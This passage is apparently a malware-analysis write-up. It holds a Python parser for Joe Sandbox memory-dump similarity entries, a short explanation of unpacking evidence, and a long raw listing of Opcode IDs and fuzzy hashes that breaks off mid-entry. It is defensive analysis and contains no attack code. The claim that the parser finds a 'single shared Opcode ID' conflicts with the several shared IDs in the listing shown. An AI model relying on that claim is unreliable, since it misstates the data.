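SOURCE_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")


def parse_entries(listing):
    """Split the listing into one dict per 'Memory Dump Source' block."""
    entries, current = [], None
    for raw in listing.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            entries.append(current)
            continue
        m = FIELD_RE.match(line)
        if not m or current is None:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        current[key] = value
        if key == "Source File":
            s = SOURCE_RE.search(value)
            if s:
                current["offset"] = int(s.group(1), 16)
                current["pe_backed"] = s.group(2) == "true"
    return entries


def cross_region_matches(entries):
    """Opcode IDs seen at more than one dump offset, with the (offset, pe_backed,
    Instruction ID) of every occurrence. Equal Opcode ID with differing
    Instruction IDs points at the same function skeleton living in two regions."""
    by_oid = defaultdict(list)
    for e in entries:
        if "Opcode ID" in e and "offset" in e:
            by_oid[e["Opcode ID"]].append(
                (e["offset"], e["pe_backed"], e.get("Instruction ID", ""))
            )
    return {
        oid: sorted(occ)
        for oid, occ in by_oid.items()
        if len({o[0] for o in occ}) > 1
    }


if __name__ == "__main__":
    ents = parse_entries(REPORT_LISTING)
    for oid, occ in cross_region_matches(ents).items():
        print(oid[:16], [(hex(off), pe) for off, pe, _ in occ])
```

Running the block prints the single shared Opcode ID with its two locations, 0x400000 (PE-backed) and 0x20f0000 (not PE-backed). A match between the on-disk image and a non-PE region is the kind of evidence that supports the report's "Detected unpacking" signatures: the same function body exists at a second, dynamically allocated address.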
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                                                                                                                                                                                                                                • Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 2bb226d847c6d85160f6813aeae79ffa1446c0b5c4b11e29441bf99546017c60
                                                                                                                                                                                                                                                                • Instruction ID: 5db382c34e96c160396c3e35f95065b7029f10674c738214f8dace2ec31d0d36
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bb226d847c6d85160f6813aeae79ffa1446c0b5c4b11e29441bf99546017c60
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92817A366443219BC7189F28C850A7BB7B3FFC4710F1A852CF9868B654EB30AC66C781
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
                                                                                                                                                                                                                                                                • Instruction ID: ba880319810bdb8e213e259538359e713a98a4b2945b2457ae3d4c78796ecc2a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47512A357043008FE7188F28C89577BB7E2EB9A320F18A62ED5D597392D7389C41C78A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: b868a3013f37864ed973b3668e501d643bc9a4679fe388745f9f5cf196745faa
                                                                                                                                                                                                                                                                • Instruction ID: 735d2f3ff736cf564653e3a9db07e1eb9d74566d845b5691c91168ad011afbd9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b868a3013f37864ed973b3668e501d643bc9a4679fe388745f9f5cf196745faa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 325143347483608BE7189F28D88477FB7E2EB82328F18893CE5D5832A1D730A819CB41
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 2a5610294b30e5e8a679adaf8088138694fc7c481e66a98cc5ba01ae8c02aa6d
                                                                                                                                                                                                                                                                • Instruction ID: c8e85d340764d3b4d6a043baf240a448254d236dbbdea7acc366692660b189d4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a5610294b30e5e8a679adaf8088138694fc7c481e66a98cc5ba01ae8c02aa6d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C87129B2A042614FC7158E28D84139FBBD1BB95324F18863EE8B9873D2D779C84AD7C1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 348a960796a6df68399cabf459a6c70aaca195daff6aee637ae217081242f236
                                                                                                                                                                                                                                                                • Instruction ID: 5cc76a493deffde601991591d12250e847c378f4817739a96a49e45f85007615
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 348a960796a6df68399cabf459a6c70aaca195daff6aee637ae217081242f236
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77712572A442214FC725CE28C88179EBBD2BB85264F19C63DE8B98B3D1D775C80AD7C1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
                                                                                                                                                                                                                                                                • Instruction ID: 4c2c0ab1878e9cfa13c7d80eb19278cb3d77386feaf759a830bf0c171a5c4840
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C613B3A7496C047D3288E3D4C112AABA934BD7230F2CC77EEDF6873E1D56988469355
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
• Instruction ID: eff1676b246d361d94545d4884e3659a86a72051283a7c2922cf4d5d67171bc5
• Opcode Fuzzy Hash: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
• Instruction Fuzzy Hash: AB61373A789AC04BD32C8E3D5CA126ABA934BD6134F1DCF6DE6F5873E1D6A588058341

Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
• Instruction ID: 19c9bc1ea9186e56c23c5e66cc144f5345884b6a785bfb5c303e44cb60fc86fa
• Opcode Fuzzy Hash: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
• Instruction Fuzzy Hash: 915126746083009BE7109F29DC45B2BB7E6EB89704F14982DF5C597292DB39DC05CBAB

Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
• Instruction ID: 583c87d3fd9d435e842b0babbfef0573c90b7f3422fd301491a952917507ab78
• Opcode Fuzzy Hash: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
• Instruction Fuzzy Hash: 2E516DB15087549FE314DF29D49435BBBE1BBC8318F044E2EE4E987390E379DA088B96

Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd

Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
• Instruction ID: 01e7228c29a9ef4f0e92d53cd7b667fdf221c0370b832ae04d599b60283e4dda
• Opcode Fuzzy Hash: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
• Instruction Fuzzy Hash: B9515BB15087548FE714DF29D89435BFBE1BB88318F144A2DE5E987390E379D6088F82

Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
• Instruction ID: 6e37d88637f30dcf1ca5a39760ca9fc235c391d288c19f204446c63a880f3ae7
• Opcode Fuzzy Hash: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
• Instruction Fuzzy Hash: 0951AE30B483648FD710DA28A480267BBD2DF95320F8A867ED4D44B3D6E67DD90DD389

Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd

Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 516e6924cf22855bcc51b03261ade72ba20a7268c254d95cb2793a6fa0abd341
• Instruction ID: 7e2fc461f1e0a673c260a8d486774d66c9cdf05ec6d3a4f5bac955a286c08e9b
• Opcode Fuzzy Hash: 516e6924cf22855bcc51b03261ade72ba20a7268c254d95cb2793a6fa0abd341
• Instruction Fuzzy Hash: B1518D61AC83C18FD7148F2888802B6BBD6DF95224F4DC67CD5A44B3D6D3369909C781

Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d04a0d8e38c3f294c211cbf0a89a7ee30207864e8a9f5169d07d9085582a6937
• Instruction ID: 1e023c5d0ae8bc499a1476ddf9e588c272e9bef8a9d0e355e0d1dc09bced5273
• Opcode Fuzzy Hash: d04a0d8e38c3f294c211cbf0a89a7ee30207864e8a9f5169d07d9085582a6937
• Instruction Fuzzy Hash: 03615C31D046A18FDB14CF28C85039DBBF1AB4E310F1AC6AAC859AB391C7799C45DF85

Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd

Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f6158e6fd38aad5bf6509a71069262e40ef65b1444f80fe14b24d050b94fc1b
• Instruction ID: c79e26550e868f874fd7c237de2382a93a8fc2db23b21b5276eb257d60ceba37
• Opcode Fuzzy Hash: 4f6158e6fd38aad5bf6509a71069262e40ef65b1444f80fe14b24d050b94fc1b
• Instruction Fuzzy Hash: EA51E033A105158BD72CCB29CC51AAE3693EBD5314B6F86BDC861A72E8CB355C01CB84

Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd

Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 14e37fb932aedb11fa387dd9939253c0f7ff1ad23df96d2736cdcaf972ad2bbb
• Instruction ID: 16d26669985d8dffd40dc58843c1f9e4a1fe08833656aa33e85019b1d206350e
• Opcode Fuzzy Hash: 14e37fb932aedb11fa387dd9939253c0f7ff1ad23df96d2736cdcaf972ad2bbb
• Instruction Fuzzy Hash: 93615B32D446B48FDB19CF28C85039DBBF1AF4A310F1A86A9D859AB3C1C7758C49CB81

Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd

Yara matches

Similarity
• API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d6b1564bfa2ad103e6c8e4ea998856fae83061142c01d468a44387b6357ebff0
                                                                                                                                                                                                                                                                • Instruction ID: 6899ddb77329bbb831532be41d59273064ce71f70d5c7327f80b0bf03e81f9fe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6b1564bfa2ad103e6c8e4ea998856fae83061142c01d468a44387b6357ebff0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D051F2B25482429FC724CF28C4917AEBBE2AFD5300F59892DE0E9C7291D775E805CF42
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 1ef048c84a4d0d30155c60ee93ead0c638561ed7b80bb9c5424c616a3cae521d
                                                                                                                                                                                                                                                                • Instruction ID: c05cde0b99ae0d3f1e095c0616943e8efbf400d5ad84f20d5780e53c3178e795
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ef048c84a4d0d30155c60ee93ead0c638561ed7b80bb9c5424c616a3cae521d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF417C7AA943155BD3345B04CDC5F3A77A3E791708F19852CEA41A72D6C7B09D0097C5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5d40f3589d6db934739ebf9594a1d5e282e52d6bab2cc16f230a3767b41ee887
                                                                                                                                                                                                                                                                • Instruction ID: 517d71214aff53e3f0e01a59fcc89686ba0f9c86754ed182d1cc2d6d49fcec59
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d40f3589d6db934739ebf9594a1d5e282e52d6bab2cc16f230a3767b41ee887
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60415B762482048BC710AF08DCC097AB7E3EBD5308F29853CE6A993391D7708E05EB81
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 80a270cec9775b927bc727ae391425bd2de1f56668aa53b1f5ee410799ab9563
                                                                                                                                                                                                                                                                • Instruction ID: d4e59386902d7f076a599dd24da1785c797e999f3f2e44946b1e4a57c50fb419
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80a270cec9775b927bc727ae391425bd2de1f56668aa53b1f5ee410799ab9563
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13319B33BA87504BD304DB628C886ABE586AFD1764F0D466DE8D4773D2C9B49C0183DD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 80a270cec9775b927bc727ae391425bd2de1f56668aa53b1f5ee410799ab9563
                                                                                                                                                                                                                                                                • Instruction ID: ac1f04ced8f9aeef6ee93e75a0d390f7a10a5e8c7b0c1945de143960eeacfd26
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80a270cec9775b927bc727ae391425bd2de1f56668aa53b1f5ee410799ab9563
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3831AE33BD83900BD384DB61CC88AEAE597AFC1728F0E454DD995A7B91CA709906C789
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 650eb172e118ef885b582a1f2118d399d062a96475d7e344e0e0ea62cb8c0cfa
                                                                                                                                                                                                                                                                • Instruction ID: 91b3a5b5f1246a979ee36d9d12028f7b1cb29bb3087e2ea45fb124c402227b29
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 650eb172e118ef885b582a1f2118d399d062a96475d7e344e0e0ea62cb8c0cfa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B31BC36584255EFDB248F94C8C0E7EF7A2FB91320F09942DE9C5271A1C772A946CBC6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 01c010b77cb3c6354ab597c6acc6aaa608f20e90445c07501ea0d45f4b435f52
                                                                                                                                                                                                                                                                • Instruction ID: dcb9fbd364b629f5ef2d99c3dad0d2ffc6cf0e28fc6bf5e4980104917471cf4c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01c010b77cb3c6354ab597c6acc6aaa608f20e90445c07501ea0d45f4b435f52
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F31593AA84220ABC3249B08DC8097A73A3FBD530CF5E8528C8C593395C7716D01EEC1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 57a1d6dc959a99ffce52465f3ced87fece6d02db5f489f15dd164950e6412c6f
                                                                                                                                                                                                                                                                • Instruction ID: 3993f51e0fc3ca7647542a329fe3cbea6e645e3760b804d94acb678751956575
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57a1d6dc959a99ffce52465f3ced87fece6d02db5f489f15dd164950e6412c6f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE21357A684250ABC3244F48D8C057BB3A2EB91308F5A443CE88953251C775ED05ABD5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 4f9a145d1016b4b0f711bdeb502ec5b34ea66807830c0b234bdd3adf214441fd
                                                                                                                                                                                                                                                                • Instruction ID: 5a5cf1d22bb4d1b825ea3cb37080c638ad4d7758c121104993538b430e344ee1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f9a145d1016b4b0f711bdeb502ec5b34ea66807830c0b234bdd3adf214441fd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 081159324492A09BC324DB28998073ABBE15B97610F584B5DF4D6E32D1D7A4CD06CB82
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f1935557e2f2806b9940cce5b2d267874e1034516f04e5d51b8115aeefe7cdf9
                                                                                                                                                                                                                                                                • Instruction ID: 46983dec8657cddcad174c32ea8346bc8685c0abc9e994224fefafeec4dea420
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1935557e2f2806b9940cce5b2d267874e1034516f04e5d51b8115aeefe7cdf9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 481157B2B0979147E72CCE3984613BBBAD2ABD6324F2DC57CC4C697289DF7884118749
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 4a164414c649293df32a122712d6e0e106fe21d8b546922be5564c9c7b9508f0
                                                                                                                                                                                                                                                                • Instruction ID: 6d5e4da253b3ea73c548436005ce08bc22c91f57dd2879f196900da6b6299abe
